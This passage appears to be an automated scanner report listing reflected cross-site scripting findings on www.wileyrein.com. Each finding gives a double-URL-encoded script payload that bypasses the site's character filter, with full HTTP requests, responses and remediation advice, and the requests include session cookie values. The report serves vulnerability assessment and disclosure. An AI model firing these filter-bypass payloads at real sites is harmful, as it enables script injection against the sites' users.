Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81a0d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eee949bf1e89 was submitted in the REST URL parameter 2. This input was echoed as 81a0d"><script>alert(1)</script>ee949bf1e89 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/ui81a0d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eee949bf1e89/ui.tabs.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b92b8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e93dc2b44d56 was submitted in the REST URL parameter 3. This input was echoed as b92b8"><script>alert(1)</script>93dc2b44d56 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/ui/ui.tabs.cssb92b8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e93dc2b44d56 HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8b59%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb748a2e0a4d was submitted in the REST URL parameter 1. This input was echoed as f8b59"><script>alert(1)</script>b748a2e0a4d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /cssf8b59%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb748a2e0a4d/ui/ui.theme.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f482%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5de43e0d372 was submitted in the REST URL parameter 2. This input was echoed as 9f482"><script>alert(1)</script>5de43e0d372 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/ui9f482%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5de43e0d372/ui.theme.css HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:12:21 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20285%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9291800f59c was submitted in the REST URL parameter 3. This input was echoed as 20285"><script>alert(1)</script>9291800f59c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/ui/ui.theme.css20285%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9291800f59c HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:12:21 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30fea%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e818c7828cb8 was submitted in the REST URL parameter 1. This input was echoed as 30fea"><script>alert(1)</script>818c7828cb8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /index.cfm30fea%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e818c7828cb8 HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:13:41 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
4.176. http://www.wileyrein.com/index.cfm [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.wileyrein.com
Path: /index.cfm
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7f23"><script>alert(1)</script>472c4d98eb6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index.cfm?e7f23"><script>alert(1)</script>472c4d98eb6=1 HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:13:39 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d732e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3c700324221 was submitted in the REST URL parameter 1. This input was echoed as d732e"><script>alert(1)</script>3c700324221 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /jsd732e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3c700324221/jq.equalheights.js HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:14:02 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f70d5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0445fb7d91b was submitted in the REST URL parameter 2. This input was echoed as f70d5"><script>alert(1)</script>0445fb7d91b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /js/jq.equalheights.jsf70d5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0445fb7d91b HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:14:03 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67315%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e635a97b6d45 was submitted in the REST URL parameter 1. This input was echoed as 67315"><script>alert(1)</script>635a97b6d45 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /js67315%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e635a97b6d45/jquery.js HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:13:32 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d428a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e229db4da92d was submitted in the REST URL parameter 2. This input was echoed as d428a"><script>alert(1)</script>229db4da92d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /js/jquery.jsd428a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e229db4da92d HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:13:33 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0519%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e056a75bdc24 was submitted in the REST URL parameter 1. This input was echoed as a0519"><script>alert(1)</script>056a75bdc24 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /jsa0519%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e056a75bdc24/menu.js HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:14:08 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72b32%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e99218231cb0 was submitted in the REST URL parameter 2. This input was echoed as 72b32"><script>alert(1)</script>99218231cb0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /js/menu.js72b32%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e99218231cb0 HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:14:09 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 651f5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e51a543addfc was submitted in the REST URL parameter 1. This input was echoed as 651f5"><script>alert(1)</script>51a543addfc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /js651f5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e51a543addfc/script.js HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:13:29 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9d57%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6a7d4ade41c was submitted in the REST URL parameter 2. This input was echoed as a9d57"><script>alert(1)</script>6a7d4ade41c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /js/script.jsa9d57%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6a7d4ade41c HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:13:30 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2bbc8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5280505d079 was submitted in the REST URL parameter 1. This input was echoed as 2bbc8"><script>alert(1)</script>5280505d079 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /js2bbc8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5280505d079/ui.core.js HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:13:34 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79a0d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e713c91dcce2 was submitted in the REST URL parameter 2. This input was echoed as 79a0d"><script>alert(1)</script>713c91dcce2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /js/ui.core.js79a0d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e713c91dcce2 HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:13:35 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33f74%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e75df592a80d was submitted in the REST URL parameter 1. This input was echoed as 33f74"><script>alert(1)</script>75df592a80d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /js33f74%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e75df592a80d/ui.datepicker.js HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:14:02 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29ad5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee294e4483ea was submitted in the REST URL parameter 2. This input was echoed as 29ad5"><script>alert(1)</script>e294e4483ea in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
